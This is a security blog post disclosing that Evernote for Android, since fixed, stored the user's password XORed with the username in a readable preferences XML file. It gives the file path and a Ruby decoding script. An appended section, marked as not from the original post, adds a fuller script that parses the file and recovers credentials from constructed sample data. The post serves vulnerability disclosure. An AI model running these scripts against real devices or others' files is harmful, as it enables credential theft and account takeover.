Adam Caudill

Security Leader, Researcher, Developer, Writer, & Photographer

Evernote: XOR & Passwords

Update: Evernote has reported that this issue has been addressed.

Evernote for Android stores various settings in an XML file. That file isn’t really protected: it’s easily readable, especially if an attacker is able to get physical access to the device, and what’s worse is that it contains the user’s credentials.

/data/data/com.evernote/shared_prefs/com.evernote_preferences.xml

The username is located in the <string name="username"> element, and the password is stored in <string name="encrypted_password">. From the name you’d assume that the password is actually encrypted. You’d be wrong.

The password is simply XORed with the username, making recovery simple.

Here’s a simple script to “decrypt” the password:

#!/usr/bin/env ruby

##
# Copyright 2013 Adam Caudill <adam@adamcaudill.com>
#
# Decodes Evernote password recovered from Evernote for Android config file:
# File: /data/data/com.evernote/shared_prefs/com.evernote_preferences.xml
#   (may also be in <userid>.prof.xml if missing from com.evernote_preferences.xml)
# Password: <string name="encrypted_password">
# Username: <string name="username">
##

require "base64"

if ARGV.count != 2
  puts 'Usage: ./evernote_pass_decode.rb <pass> <username>'
  exit 1
end

pass = Base64.decode64(ARGV[0])  # stored value is base64 of the XORed bytes
user = ARGV[1]
final = ''

# XOR each password byte with the username, repeating the username as needed
pass.bytes.each_with_index do |byte, index|
  final += (byte ^ user.bytes[index % user.bytesize]).chr
end

puts "Password: #{final}"
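To show why this scheme offers no protection, here is an added example (not from the original post) that reads both values straight out of a shared_prefs XML and recovers the password; the XML, username and password are constructed sample data. Because XOR is its own inverse, the same function that "decrypts" the value is the one that produced it, and the key (the username) sits in the same file as the ciphertext.

```ruby
#!/usr/bin/env ruby
# Added example, not part of the original post. Recovers the Evernote for
# Android credential pair from a shared_prefs XML using the XOR-with-username
# scheme the post describes. The XML below is a constructed sample.
require "base64"
require "rexml/document"

# Constructed sample of com.evernote_preferences.xml (values are made up).
SAMPLE_PREFS = <<~XML
  <?xml version='1.0' encoding='utf-8' standalone='yes' ?>
  <map>
      <string name="username">alice</string>
      <string name="encrypted_password">CRkHFwATXg==</string>
  </map>
XML

# XOR each byte of +data+ with the username, repeating the username as
# needed. XOR is symmetric, so this both "encrypts" and "decrypts", and the
# key is whatever is stored next to the ciphertext.
def xor_with_username(data, username)
  key = username.bytes
  raise ArgumentError, "username must not be empty" if key.empty?
  out = data.bytes.each_with_index.map { |b, i| b ^ key[i % key.length] }
  out.pack("C*").force_encoding(Encoding::UTF_8)
end

# Pull the two <string name="..."> values out of an Android shared_prefs XML.
def read_prefs(xml)
  doc  = REXML::Document.new(xml)
  user = REXML::XPath.first(doc, "//string[@name='username']")
  pass = REXML::XPath.first(doc, "//string[@name='encrypted_password']")
  raise "username or encrypted_password element missing" if user.nil? || pass.nil?
  [user.text, pass.text]
end

# Returns [username, plaintext password] recovered from the prefs XML.
def recover_credentials(xml)
  user, enc = read_prefs(xml)
  [user, xor_with_username(Base64.decode64(enc), user)]
end

if $PROGRAM_NAME == __FILE__
  xml = ARGV[0] ? File.read(ARGV[0]) : SAMPLE_PREFS
  user, pass = recover_credentials(xml)
  puts "Username: #{user}"
  puts "Password: #{pass}"
end
```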
